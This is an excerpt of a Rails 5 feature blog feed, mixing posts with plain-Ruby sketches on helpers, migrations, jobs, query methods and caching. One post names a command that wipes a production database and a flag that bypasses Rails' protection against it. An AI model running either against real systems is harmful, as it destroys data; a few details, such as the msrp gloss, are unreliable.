class UsersController &lt; ApplicationController
  def update
    @user = User.find params[:id]
    if @user.update_attributes(user_params)
      notice = &quot;#{helpers.full_name(@user)} is successfully updated&quot;
      redirect_to user_path(@user), notice: notice
    else
      render :edit
    end
  end
end</code></pre><p>This removes some of the drawbacks of including helper modules and is a much cleaner solution.</p>]]></content>
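The idea behind the helpers accessor can be shown in plain Ruby without Rails: instead of mixing the module into the controller, the controller exposes a proxy object extended with the helper module. The classes below are hypothetical stand-ins, not the actual Rails implementation:

```ruby
module UsersHelper
  def full_name(user)
    "#{user.first_name} #{user.last_name}"
  end
end

class UsersController
  # A proxy carrying the helper methods, in the spirit of Rails 5's `helpers`:
  # the controller's own namespace is never polluted by the module.
  def helpers
    @helpers ||= Object.new.extend(UsersHelper)
  end
end

User = Struct.new(:first_name, :last_name)

controller = UsersController.new
controller.helpers.full_name(User.new("Jane", "Doe"))  # helper is reachable
controller.respond_to?(:full_name)                     # but not mixed in
```

The design choice is the point: by routing calls through a proxy, name collisions between helper methods and controller methods become impossible.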
    </entry><entry>
       <title><![CDATA[Rails 5 supports adding comments in migrations]]></title>
       <author><name>Prajakta Tambe</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-supports-adding-comments-migrations"/>
      <updated>2016-06-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-supports-adding-comments-migrations</id>
      <content type="html"><![CDATA[<p>Database schemas change rapidly as a project progresses, and it can be difficult to track the purpose of each table and each column in a large project with multiple team members.</p><p>The solution to this problem is to document data models right from Rails migrations.</p><h3>Solution in Rails 4</h3><p>You can add comments in Rails 4.x migrations using gems like <a href="https://github.com/pinnymz/migration_comments">migration_comments</a> and <a href="https://github.com/albertosaurus/pg_comment">pg_comment</a>.</p><h3>Solution in Rails 5</h3><p>Rails 5 <a href="https://github.com/rails/rails/pull/22911">allows specifying comments</a> for tables, columns and indexes in migrations.</p><p>These comments are stored in the database itself.</p><p>Currently only MySQL and PostgreSQL support adding comments.</p><p>We can add comments in a migration as shown below.</p><pre><code class="language-ruby">class CreateProducts &lt; ActiveRecord::Migration[5.0]
  def change
    create_table :products, comment: 'Products table' do |t|
      t.string :name, comment: 'Name of the product'
      t.string :barcode, comment: 'Barcode of the product'
      t.string :description, comment: 'Product details'
      t.float :msrp, comment: 'Maximum Retail Price'
      t.float :our_price, comment: 'Selling price'
      t.timestamps
    end

    add_index :products, :name,
              name: 'index_products_on_name',
              unique: true,
              comment: 'Index used to lookup product by name.'
  end
end</code></pre><p>When we run the above migration, the output will look as shown below.</p><pre><code class="language-ruby">  rails_5_app rake db:migrate:up VERSION=20160429081156
== 20160429081156 CreateProducts: migrating ===================================
-- create_table(:products, {:comment=&gt;&quot;Products table&quot;})
   -&gt; 0.0119s
-- add_index(:products, :name, {:name=&gt;&quot;index_products_on_name&quot;, :unique=&gt;true, :comment=&gt;&quot;Index used to lookup product by name.&quot;})
   -&gt; 0.0038s
== 20160429081156 CreateProducts: migrated (0.0159s) ==========================</code></pre><p>The comments are also dumped in the <code>db/schema.rb</code> file for PostgreSQL and MySQL.</p><p>The <code>db/schema.rb</code> of the application will have the following content after running the <code>products</code> table migration.</p><pre><code class="language-ruby">ActiveRecord::Schema.define(version: 20160429081156) do
  # These are extensions that must be enabled in order to support this database
  enable_extension &quot;plpgsql&quot;

  create_table &quot;products&quot;, force: :cascade, comment: &quot;Products table&quot; do |t|
    t.string   &quot;name&quot;,                     comment: &quot;Name of the product&quot;
    t.string   &quot;barcode&quot;,                  comment: &quot;Barcode of the product&quot;
    t.string   &quot;description&quot;,              comment: &quot;Product details&quot;
    t.float    &quot;msrp&quot;,                     comment: &quot;Maximum Retail Price&quot;
    t.float    &quot;our_price&quot;,                comment: &quot;Selling price&quot;
    t.datetime &quot;created_at&quot;,  null: false
    t.datetime &quot;updated_at&quot;,  null: false
    t.index [&quot;name&quot;], name: &quot;index_products_on_name&quot;, unique: true, using: :btree, comment: &quot;Index used to lookup product by name.&quot;
  end
end</code></pre><p>We can view these comments with database administration tools such as MySQL Workbench or PgAdmin
III.</p><p>PgAdmin III will show database structure with comments as shown below.</p><pre><code class="language-plaintext">-- Table: products-- DROP TABLE products;CREATE TABLE products(  id serial NOT NULL,  name character varying, -- Name of the product  barcode character varying, -- Barcode of the product  description character varying, -- Product details with string data type  msrp double precision, -- Maximum Retail price  our_price double precision, -- Selling price  created_at timestamp without time zone NOT NULL,  updated_at timestamp without time zone NOT NULL,  CONSTRAINT products_pkey PRIMARY KEY (id))WITH (  OIDS=FALSE);ALTER TABLE products  OWNER TO postgres;COMMENT ON TABLE products  IS 'Products table';COMMENT ON COLUMN products.name IS 'Name of the product';COMMENT ON COLUMN products.barcode IS 'Barcode of the product';COMMENT ON COLUMN products.description IS 'Product details with string data type';COMMENT ON COLUMN products.msrp IS 'Maximum Retail price';COMMENT ON COLUMN products.our_price IS 'Selling price';-- Index: index_products_on_name-- DROP INDEX index_products_on_name;CREATE UNIQUE INDEX index_products_on_name  ON products  USING btree  (name COLLATE pg_catalog.&quot;default&quot;);COMMENT ON INDEX index_products_on_name  IS 'Index used to lookup product by name.';</code></pre><p>If we update comments through migrations, corresponding comments will be updatedin <code>db/schema.rb</code> file.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 allows UUID as column type in create_join_table]]></title>
       <author><name>Hitesh Rawal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-create-join-table-with-uuid"/>
      <updated>2016-06-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-create-join-table-with-uuid</id>
      <content type="html"><![CDATA[<p>In Rails 4.x, <a href="http://api.rubyonrails.org/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-create_join_table">create_join_table</a> allows us to create a new join table whose name is derived from its first two arguments.</p><pre><code class="language-ruby">class CreateJoinTableCustomerProduct &lt; ActiveRecord::Migration
  def change
    create_join_table(:customers, :products)
  end
end</code></pre><p>It will create a new join table <code>customers_products</code> with the columns <code>customer_id</code> and <code>product_id</code>. We can also pass a block to <code>create_join_table</code>.</p><pre><code class="language-ruby">class CreateJoinTableCustomerProduct &lt; ActiveRecord::Migration
  def change
    create_join_table :customers, :products do |t|
      t.index :customer_id
      t.index :product_id
    end
  end
end</code></pre><p>However, <code>create_join_table</code> won't allow us to define the column type. It will always create columns of <code>integer</code> type, because Rails 4.x by default uses an auto-incrementing <code>integer</code> as the primary key type.</p><p>If we wish to set <code>uuid</code> as the column type, then <code>create_join_table</code> won't work. In such cases we have to create the join table manually using <code>create_table</code>.</p><p>Here is an example with Rails 4.x.</p><pre><code class="language-ruby">class CreateJoinTableCustomerProduct &lt; ActiveRecord::Migration
  def change
    create_table :customer_products do |t|
      t.uuid :customer_id
      t.uuid :product_id
    end
  end
end</code></pre><h2>Rails 5 allows UUID as the column type in join tables</h2><p>Rails 5 has started supporting UUID as a column type for the primary key, so <code>create_join_table</code> should also support UUID as a column type instead of only integers.
Hence Rails 5 now allows us to use <a href="https://github.com/rails/rails/pull/24221">UUID as a column type with create_join_table</a>.</p><p>Here is the revised example.</p><pre><code class="language-ruby">class CreateJoinTableCustomerProduct &lt; ActiveRecord::Migration[5.0]
  def change
    create_join_table(:customers, :products, column_options: {type: :uuid})
  end
end</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 adds another base class Application Job for jobs]]></title>
       <author><name>Hitesh Rawal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-application-jobs-for-jobs"/>
      <updated>2016-06-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-application-jobs-for-jobs</id>
      <content type="html"><![CDATA[<p>Rails 5 has added another base class, <a href="https://github.com/rails/rails/pull/19034">ApplicationJob</a>, which inherits from <code>ActiveJob::Base</code>. Now, by default, all new Rails 5 applications will have <code>application_job.rb</code>.</p><pre><code class="language-ruby"># app/jobs/application_job.rb
class ApplicationJob &lt; ActiveJob::Base
end</code></pre><p>In Rails 4.x, if we want to use <a href="http://guides.rubyonrails.org/active_job_basics.html">ActiveJob</a>, we first need to generate a job, and all the generated jobs directly inherit from <code>ActiveJob::Base</code>.</p><pre><code class="language-ruby"># app/jobs/guests_cleanup_job.rb
class GuestsCleanupJob &lt; ActiveJob::Base
  queue_as :default

  def perform(*guests)
    # Do something later
  end
end</code></pre><p>Rails 5 adds the explicit base class <code>ApplicationJob</code> for <code>ActiveJob</code>. As you can see, this is not a big change, but it is a good change in terms of being consistent with how controllers have <code>ApplicationController</code> and models have <a href="application-record-in-rails-5">ApplicationRecord</a>.</p><p>Now <code>ApplicationJob</code> will be a single place to apply all kinds of customizations and extensions needed for an application, instead of patching <code>ActiveJob::Base</code>.</p><h2>Upgrading from Rails 4.x</h2><p>When upgrading from Rails 4.x to Rails 5, we need to create an <code>application_job.rb</code> file in <code>app/jobs/</code> and add the following content.</p><pre><code class="language-ruby"># app/jobs/application_job.rb
class ApplicationJob &lt; ActiveJob::Base
end</code></pre><p>We also need to change all the existing job classes to inherit from <code>ApplicationJob</code> instead of <code>ActiveJob::Base</code>.</p><p>Here is the revised code of the <code>GuestsCleanupJob</code> class.</p><pre><code class="language-ruby"># app/jobs/guests_cleanup_job.rb
class GuestsCleanupJob &lt; ApplicationJob
  queue_as :default

  def perform(*guests)
    # Do something later
  end
end</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Updating records in AR Relation]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-allows-updating-relation-objects-along-with-callbacks-and-validations"/>
      <updated>2016-06-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-allows-updating-relation-objects-along-with-callbacks-and-validations</id>
      <content type="html"><![CDATA[<p>The <code>update_all</code> method, when called on an <code>ActiveRecord::Relation</code> object, updates all the records without invoking any callbacks and validations on the records being updated.</p><p>Rails 5 supports the <a href="https://github.com/rails/rails/pull/11898">update method on an ActiveRecord::Relation object</a>, which runs callbacks and validations on all the records in the relation.</p><pre><code class="language-ruby">people = Person.where(country: 'US')
people.update(language: 'English', currency: 'USD')</code></pre><p>Internally, the above code runs the <code>update</code> method on each <code>Person</code> record whose country is <code>'US'</code>.</p><p>Let's see what happens when <code>update</code> is called on a relation in which validations fail on a few records.</p><p>We have a Note model. For simplicity, let's add a validation that the <code>note_text</code> field cannot be blank for the first three records.</p><pre><code class="language-ruby">class Note &lt; ApplicationRecord
  validate :valid_note

  def valid_note
    errors.add(:note_text, &quot;note_text is blank&quot;) if id &lt;= 3 &amp;&amp; note_text.blank?
  end
end</code></pre><p>Now let's try and update all the records with a blank <code>note_text</code>.</p><pre><code class="language-ruby"> &gt; Note.all.update(note_text: '')
  Note Load (0.3ms)  SELECT `notes`.* FROM `notes`
   (0.1ms)  BEGIN
   (0.1ms)  ROLLBACK
   (0.1ms)  BEGIN
   (0.1ms)  ROLLBACK
   (0.1ms)  BEGIN
   (0.1ms)  ROLLBACK
   (0.1ms)  BEGIN
  SQL (2.9ms)  UPDATE `notes` SET `note_text` = '', `updated_at` = '2016-06-16 19:42:21' WHERE `notes`.`id` = 3
   (0.7ms)  COMMIT
   (0.1ms)  BEGIN
  SQL (0.3ms)  UPDATE `notes` SET `note_text` = '', `updated_at` = '2016-06-16 19:42:21' WHERE `notes`.`id` = 4
   (1.2ms)  COMMIT
   (0.1ms)  BEGIN
  SQL (0.3ms)  UPDATE `notes` SET `note_text` = '', `updated_at` = '2016-06-16 19:42:21' WHERE `notes`.`id` = 5
   (0.3ms)  COMMIT
   (0.1ms)  BEGIN
  SQL (3.4ms)  UPDATE `notes` SET `note_text` = '', `updated_at` = '2016-06-16 19:42:21' WHERE `notes`.`id` = 6
   (0.2ms)  COMMIT
 =&gt; [#&lt;Note id: 1, user_id: 1, note_text: &quot;&quot;, created_at: &quot;2016-06-03 10:02:54&quot;, updated_at: &quot;2016-06-16 19:42:21&quot;&gt;, #&lt;Note id: 2, user_id: 1, note_text: &quot;&quot;, created_at: &quot;2016-06-03 10:03:54&quot;, updated_at: &quot;2016-06-16 19:42:21&quot;&gt;, #&lt;Note id: 3, user_id: 1, note_text: &quot;&quot;, created_at: &quot;2016-06-03 12:35:20&quot;, updated_at: &quot;2016-06-03 12:35:20&quot;&gt;, #&lt;Note id: 4, user_id: 1, note_text: &quot;&quot;, created_at: &quot;2016-06-03 14:15:15&quot;, updated_at: &quot;2016-06-16 19:14:20&quot;&gt;, #&lt;Note id: 5, user_id: 1, note_text: &quot;&quot;, created_at: &quot;2016-06-03 14:15:41&quot;, updated_at: &quot;2016-06-16 19:42:21&quot;&gt;, #&lt;Note id: 6, user_id: 1, note_text: &quot;&quot;, created_at: &quot;2016-06-03 14:16:20&quot;, updated_at: &quot;2016-06-16 19:42:21&quot;&gt;]</code></pre><p>We can see that the failure of validations on some records in the relation does not stop us from updating the valid records.</p><p>Also, the return value of update on an AR Relation is an array of the records in the relation. We can see that the attributes in these records hold the values that we wanted them to have after the update.</p><p>For example, in the above-mentioned case, we can see that in the returned array the records with ids 1, 2 and 3 have blank <code>note_text</code> values even though those records weren't updated.</p><p>Hence we may not be able to rely on the return value to know whether the update was successful on any particular record.</p><p>For scenarios where running validations and callbacks is not important and/or where performance is a concern, it is advisable to use the <code>update_all</code> method instead of the <code>update</code> method.</p>]]></content>
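The per-record semantics can be sketched in plain Ruby. This is a deliberately simplified model (Struct instead of ActiveRecord, a hypothetical valid_for? check): invalid records are skipped while valid ones are updated. Note one difference from the real behaviour described above: in Rails, the returned records still carry the assigned attributes even when their update was rolled back.

```ruby
# Hypothetical model: records with id 1..3 reject a blank note_text.
Note = Struct.new(:id, :note_text) do
  def valid_for?(text)
    id > 3 || !text.strip.empty?
  end
end

# In the spirit of Relation#update: validate and update each record
# individually, and return the whole collection regardless of failures.
def update_records(notes, text)
  notes.each do |note|
    note.note_text = text if note.valid_for?(text)
  end
  notes
end

notes = (1..6).map { |i| Note.new(i, "original #{i}") }
result = update_records(notes, "")
result.map { |n| n.note_text }  # first three keep their old value
```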
    </entry><entry>
       <title><![CDATA[Rails 5 prevents destructive action on production database]]></title>
       <author><name>Hitesh Rawal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-prevents-destructive-action-on-production-db"/>
      <updated>2016-06-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-prevents-destructive-action-on-production-db</id>
      <content type="html"><![CDATA[<p>Sometimes, while debugging a production issue, developers mistakenly execute commands like <code>RAILS_ENV=production rake db:schema:load</code>. This wipes out data in production.</p><p>Users of Heroku download all the config variables to their local machine to debug a production problem, and sometimes developers mistakenly execute commands which wipe out production data. This has happened often enough to Heroku users that <a href="https://twitter.com/schneems">Richard Schneeman</a> of Heroku decided to do something about this issue.</p><h2>Rails 5 prevents destructive actions on the production database</h2><p>Rails 5 <a href="https://github.com/rails/rails/pull/22967">has added</a> a new table, <code>ar_internal_metadata</code>, to store the <code>environment</code> that was used at the time of migrating the database.</p><p>When <code>rake db:migrate</code> is first executed in production, the new table stores the value <code>production</code>. Now, whenever we load the <a href="https://github.com/rails/rails/pull/24399">database schema</a> or <a href="https://github.com/rails/rails/pull/24484">database structure</a> by running <code>rake db:schema:load</code> or <code>rake db:structure:load</code>, Rails will check whether the Rails environment is &quot;production&quot; or not.
If it is not, Rails will raise an exception, thus preventing the data wipeout.</p><p>To skip this environment check, we can manually pass <code>DISABLE_DATABASE_ENVIRONMENT_CHECK=1</code> as an argument with the schema/structure load command.</p><p>Here is an example of running <code>rake db:schema:load</code> when the development db is pointing to the production database.</p><pre><code class="language-ruby">$ rake db:schema:load
rake aborted!
ActiveRecord::ProtectedEnvironmentError: You are attempting to run a destructive action against your 'production' database.
If you are sure you want to continue, run the same command with the environment variable:
DISABLE_DATABASE_ENVIRONMENT_CHECK=1</code></pre><p>As we can see, Rails prevented a data wipeout in production.</p><p>This is one of those features which hopefully you won't notice. However, if you happen to do something destructive to your production database, this feature will come in handy.</p>]]></content>
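The guard logic can be sketched in plain Ruby. The function and its arguments are hypothetical (in Rails, the stored environment is read from ar_internal_metadata and compared against Rails.env), but the decision flow matches the description above:

```ruby
ProtectedEnvironmentError = Class.new(StandardError)

# Hypothetical sketch of the check Rails 5 runs before db:schema:load /
# db:structure:load. `env` stands in for ENV.
def check_protected_environment!(stored_environment, current_environment, env = {})
  # The escape hatch mentioned in the post
  return if env["DISABLE_DATABASE_ENVIRONMENT_CHECK"] == "1"
  # Only a database migrated under production is protected
  return unless stored_environment == "production"
  # Running in production against the production database is fine
  return if current_environment == "production"

  raise ProtectedEnvironmentError,
        "You are attempting to run a destructive action against your 'production' database."
end

check_protected_environment!("production", "production")  # passes silently
# check_protected_environment!("production", "development") would raise
check_protected_environment!("production", "development",
                             "DISABLE_DATABASE_ENVIRONMENT_CHECK" => "1")  # skipped
```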
    </entry><entry>
       <title><![CDATA[Rails 5 adds finish option in find_in_batches]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-provides-finish-option-for-find-in-batches"/>
      <updated>2016-06-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-provides-finish-option-for-find-in-batches</id>
      <content type="html"><![CDATA[<p>In Rails 4.x we had the <code>start</code> option in the <code>find_in_batches</code> method.</p><pre><code class="language-ruby">Person.find_in_batches(start: 1000, batch_size: 2000) do |group|
  group.each { |person| person.party_all_night! }
end</code></pre><p>The above code provides batches of <code>Person</code> starting from the record whose primary key value is equal to 1000.</p><p>There is no end value for the primary key. That means, in the above case, all the records that have a primary key value greater than 1000 are fetched.</p><p>Rails 5 <a href="https://github.com/rails/rails/pull/12257">introduces the finish option</a>, which serves as an upper limit on the primary key value of the records being fetched.</p><pre><code class="language-ruby">Person.find_in_batches(start: 1000, finish: 9500, batch_size: 2000) do |group|
  group.each { |person| person.party_all_night! }
end</code></pre><p>The above code ensures that no record in any of the batches has a primary key value greater than 9500.</p>]]></content>
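The start/finish semantics can be sketched over a plain array of ids (Rails does this with primary-key-ranged SQL queries instead). The helper name below is hypothetical:

```ruby
# Hypothetical in-memory sketch of find_in_batches with start/finish bounds:
# keep only ids within [start, finish], then yield them in fixed-size batches.
def find_in_batches_sketch(ids, start:, finish:, batch_size:)
  ids.sort
     .select { |id| (start..finish).cover?(id) }
     .each_slice(batch_size) { |batch| yield batch }
end

batches = []
find_in_batches_sketch((1..25).to_a, start: 5, finish: 20, batch_size: 10) do |batch|
  batches.push(batch)
end
# ids 5..20 are fetched, split into batches of at most 10
```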
    </entry><entry>
       <title><![CDATA[Rails 5 introduces country_zones helper method]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-introduces-helpers-for-country-zones"/>
      <updated>2016-06-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-introduces-helpers-for-country-zones</id>
      <content type="html"><![CDATA[<p>Before Rails 5, we could fetch all time zones for the US by using the <code>us_zones</code> method as follows.</p><pre><code class="language-ruby">&gt; puts ActiveSupport::TimeZone.us_zones.map(&amp;:to_s)
(GMT-10:00) Hawaii
(GMT-09:00) Alaska
(GMT-08:00) Pacific Time (US &amp; Canada)
(GMT-07:00) Arizona
(GMT-07:00) Mountain Time (US &amp; Canada)
(GMT-06:00) Central Time (US &amp; Canada)
(GMT-05:00) Eastern Time (US &amp; Canada)
(GMT-05:00) Indiana (East)</code></pre><p>Such functionality of getting all the <code>TimeZone</code> objects was implemented for only one country, the US.</p><p>The <code>TimeZone</code> class internally uses the <code>TzInfo</code> gem, which does have an API for providing time zones for all countries.</p><p>Realizing this, the Rails community decided to <a href="https://github.com/rails/rails/pull/20625">introduce a helper method country_zones</a> on the <code>ActiveSupport::TimeZone</code> class that fetches a collection of <code>TimeZone</code> objects belonging to a country specified by its ISO 3166-1 Alpha-2 code.</p><pre><code class="language-ruby">&gt; puts ActiveSupport::TimeZone.country_zones('us').map(&amp;:to_s)
(GMT-10:00) Hawaii
(GMT-09:00) Alaska
(GMT-08:00) Pacific Time (US &amp; Canada)
(GMT-07:00) Arizona
(GMT-07:00) Mountain Time (US &amp; Canada)
(GMT-06:00) Central Time (US &amp; Canada)
(GMT-05:00) Eastern Time (US &amp; Canada)
(GMT-05:00) Indiana (East)

&gt; puts ActiveSupport::TimeZone.country_zones('fr').map(&amp;:to_s)
(GMT+01:00) Paris</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 provides fragment caching in Action Mailer views]]></title>
       <author><name>Prajakta Tambe</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-provides-fragment-caching-in-action-mailer-view"/>
      <updated>2016-05-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-provides-fragment-caching-in-action-mailer-view</id>
       <content type="html"><![CDATA[<p>Fragment caching helps in caching parts of a view instead of caching the entire view. It is used when different parts of the view need to be cached and expired separately. Before Rails 5, fragment caching was supported only in Action View templates.</p><p>Rails 5 provides <a href="https://github.com/rails/rails/commit/e40518f5d44303ed91641b342a53bdfb32753de3">fragment caching in Action Mailer views</a>. To use this feature, we need to configure our application as follows.</p><pre><code class="language-ruby">config.action_mailer.perform_caching = true</code></pre><p>This configuration specifies whether mailer templates should perform fragment caching or not. By default, this is set to <code>false</code> for all environments.</p><h2>Fragment caching in views</h2><p>We can do caching in mailer views similar to application views using the <code>cache</code> method. The following example shows the usage of fragment caching in the mailer view of the welcome mail. Note that the username is rendered outside the cached fragment, since it differs per user.</p><pre><code class="language-ruby">&lt;body&gt;
  &lt;% cache 'signup-text' do %&gt;
    &lt;h1&gt;Welcome to &lt;%= @company.name %&gt;&lt;/h1&gt;
    &lt;p&gt;You have successfully signed up to &lt;%= @company.name %&gt;. Your username is:
  &lt;% end %&gt;
    &lt;%= @user.login %&gt;.&lt;br /&gt;
  &lt;/p&gt;
  &lt;%= render :partial =&gt; 'footer' %&gt;
&lt;/body&gt;</code></pre><p>When we render the view for the first time, we can see the cache digest of the view and its partial.</p><pre><code class="language-ruby">Cache digest for app/views/user_mailer/_footer.erb: 7313427d26cc1f701b1e0212498cee38
Cache digest for app/views/user_mailer/welcome_email.html.erb: 30efff0173fd5f29a88ffe79a9eab617
  Rendered user_mailer/_footer.erb (0.3ms)
  Rendered user_mailer/welcome_email.html.erb (26.1ms)
Cache digest for app/views/user_mailer/welcome_email.text.erb: 77f41fe6159c5736ab2026a44bc8de55
  Rendered user_mailer/welcome_email.text.erb (0.2ms)
UserMailer#welcome_email: processed outbound mail in 190.3ms</code></pre><p>We can also use fragment caching in partials of Action Mailer views with the <code>cache</code> method. Fragment caching is also supported in multipart emails.</p>]]></content>
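The core idea of fragment caching — render a block once, then serve the stored copy under a key — can be sketched in plain Ruby. `FragmentCache` below is purely illustrative and stands in for Rails' `cache` view helper, which writes to a real cache store rather than a Hash.

```ruby
# Illustrative fragment cache: the block runs only on a cache miss; later
# lookups for the same key return the stored fragment without rendering.
class FragmentCache
  attr_reader :renders

  def initialize
    @store = {}
    @renders = 0
  end

  def cache(key)
    @store[key] ||= begin
      @renders += 1 # count how many times the block actually ran
      yield
    end
  end
end

fragments = FragmentCache.new
2.times { fragments.cache("signup-text") { "Welcome to BigBinary" } }
puts fragments.renders # => 1, the fragment was rendered only once
```

Expiring a fragment would amount to deleting its key, which is why parts that change at different rates get separate keys.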
    </entry><entry>
       <title><![CDATA[Rails 5 adds OR support in Active Record]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-or-support-in-active-record"/>
      <updated>2016-05-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-or-support-in-active-record</id>
       <content type="html"><![CDATA[<p>Rails 5 <a href="https://github.com/rails/rails/commit/b0b37942d729b6bdcd2e3178eda7fa1de203b3d0">has added an OR method</a> to Active Record relations for generating queries with an OR clause.</p><pre><code class="language-ruby">&gt;&gt; Post.where(id: 1).or(Post.where(title: 'Learn Rails'))
   SELECT &quot;posts&quot;.* FROM &quot;posts&quot; WHERE (&quot;posts&quot;.&quot;id&quot; = ? OR &quot;posts&quot;.&quot;title&quot; = ?)  [[&quot;id&quot;, 1], [&quot;title&quot;, &quot;Learn Rails&quot;]]
=&gt; &lt;ActiveRecord::Relation [#&lt;Post id: 1, title: 'Rails'&gt;]&gt;</code></pre><p>This returns an <code>ActiveRecord::Relation</code> object, which is the logical union of the two relations.</p><h3>Some examples of OR usage</h3><h5>With group and having</h5><pre><code class="language-ruby">&gt;&gt; posts = Post.group(:user_id)
&gt;&gt; posts.having('id &gt; 3').or(posts.having('title like &quot;Hi%&quot;'))
SELECT &quot;posts&quot;.* FROM &quot;posts&quot; GROUP BY &quot;posts&quot;.&quot;user_id&quot; HAVING ((id &gt; 3) OR (title like &quot;Hi%&quot;))
=&gt; &lt;ActiveRecord::Relation [#&lt;Post id: 3, title: &quot;Hi&quot;, user_id: 4&gt;, #&lt;Post id: 6, title: &quot;Another new blog&quot;, user_id: 6&gt;]&gt;</code></pre><h5>With scope</h5><pre><code class="language-ruby">class Post &lt; ApplicationRecord
  scope :contains_blog_keyword, -&gt; { where(&quot;title LIKE '%blog%'&quot;) }
end

&gt;&gt; Post.contains_blog_keyword.or(Post.where('id &gt; 3'))
SELECT &quot;posts&quot;.* FROM &quot;posts&quot; WHERE ((title LIKE '%blog%') OR (id &gt; 3))
=&gt; &lt;ActiveRecord::Relation [#&lt;Post id: 4, title: &quot;A new blog&quot;, user_id: 6&gt;, #&lt;Post id: 5, title: &quot;Rails blog&quot;, user_id: 4&gt;, #&lt;Post id: 6, title: &quot;Another new blog&quot;, user_id: 6&gt;]&gt;</code></pre><h5>With a combination of scopes</h5><pre><code class="language-ruby">class Post &lt; ApplicationRecord
  scope :contains_blog_keyword, -&gt; { where(&quot;title LIKE '%blog%'&quot;) }
  scope :id_greater_than, -&gt;(id) { where(&quot;id &gt; ?&quot;, id) }
  scope :containing_blog_keyword_with_id_greater_than, -&gt;(id) { contains_blog_keyword.or(id_greater_than(id)) }
end

&gt;&gt; Post.containing_blog_keyword_with_id_greater_than(2)
SELECT &quot;posts&quot;.* FROM &quot;posts&quot; WHERE ((title LIKE '%blog%') OR (id &gt; 2))
=&gt; &lt;ActiveRecord::Relation [#&lt;Post id: 3, title: &quot;Hi&quot;, user_id: 4&gt;, #&lt;Post id: 4, title: &quot;A new blog&quot;, user_id: 6&gt;, #&lt;Post id: 5, title: &quot;Rails blog&quot;, user_id: 4&gt;, #&lt;Post id: 6, title: &quot;Another new blog&quot;, user_id: 6&gt;]&gt;</code></pre><h4>Constraints for using the OR method</h4><p>The two relations must be structurally compatible: they must be scoping the same model, and they must differ only by their <code>WHERE</code> or <code>HAVING</code> clauses.</p><p>When <code>limit</code>, <code>offset</code>, or <code>distinct</code> is passed with only one of the relations, an <code>ArgumentError</code> is thrown as shown below.</p><pre><code class="language-ruby">&gt;&gt; Post.where(id: 1).limit(1).or(Post.where(:id =&gt; [2, 3]))
ArgumentError: Relation passed to #or must be structurally compatible. Incompatible values: [:limit]</code></pre><p>As of now, we can use <code>limit</code>, <code>offset</code>, or <code>distinct</code> when they are passed with both relations and with the same parameters.</p><pre><code class="language-ruby">&gt;&gt; Post.where(id: 1).limit(2).or(Post.where(:id =&gt; [2, 3]).limit(2))
SELECT  &quot;posts&quot;.* FROM &quot;posts&quot; WHERE (&quot;posts&quot;.&quot;id&quot; = ? OR &quot;posts&quot;.&quot;id&quot; IN (2, 3)) LIMIT ?  [[&quot;id&quot;, 1], [&quot;LIMIT&quot;, 2]]
=&gt; &lt;ActiveRecord::Relation [#&lt;Post id: 1, title: 'Blog', user_id: 3, published: true&gt;, #&lt;Post id: 2, title: 'Rails 5 post', user_id: 4, published: true&gt;]&gt;</code></pre><p>There is an open <a href="https://github.com/rails/rails/issues/24055">issue</a> in which discussions are ongoing about completely disallowing the usage of <code>limit</code>, <code>offset</code>, or <code>distinct</code> with <code>or</code>.</p>]]></content>
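The structural-compatibility check described above can be sketched in plain Ruby. `Relation` here is a tiny illustrative stand-in for `ActiveRecord::Relation`, showing only why mismatched `limit`/`offset`/`distinct` values are rejected while matching ones are allowed.

```ruby
# Illustrative stand-in: relations may differ only in their WHERE/HAVING
# parts, so limit, offset, and distinct must match on both sides of #or.
Relation = Struct.new(:where_clause, :limit, :offset, :distinct) do
  def or(other)
    incompatible = [:limit, :offset, :distinct].reject do |clause|
      self[clause] == other[clause]
    end
    unless incompatible.empty?
      raise ArgumentError, "Relation passed to #or must be structurally " \
                           "compatible. Incompatible values: #{incompatible}"
    end
    # Combine the WHERE parts into a logical union.
    Relation.new("(#{where_clause}) OR (#{other.where_clause})",
                 limit, offset, distinct)
  end
end

a = Relation.new("id = 1", 1, nil, nil)
b = Relation.new("id IN (2, 3)", nil, nil, nil)
begin
  a.or(b)
rescue ArgumentError => e
  puts e.message # the limits differ, so the call is rejected
end

c = Relation.new("id = 1", 2, nil, nil)
d = Relation.new("id IN (2, 3)", 2, nil, nil)
puts c.or(d).where_clause # => "(id = 1) OR (id IN (2, 3))"
```

Defining a method literally named `or` is legal Ruby as long as it is always called with an explicit receiver, which is exactly how Active Record's own `#or` works.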
    </entry><entry>
       <title><![CDATA[Rails 5 ArrayInquirer and checking array contents]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-introduces-active-support-array-inquirer"/>
      <updated>2016-05-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-introduces-active-support-array-inquirer</id>
